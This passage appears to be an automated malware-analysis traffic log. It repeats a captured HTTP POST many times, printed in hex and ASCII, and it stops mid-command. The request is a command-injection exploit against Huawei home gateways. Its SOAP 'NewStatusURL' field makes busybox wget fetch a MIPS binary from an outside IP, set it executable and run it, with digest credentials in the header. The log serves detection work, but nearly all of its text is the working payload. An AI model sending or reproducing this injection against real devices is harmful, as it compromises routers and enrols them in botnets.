4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox 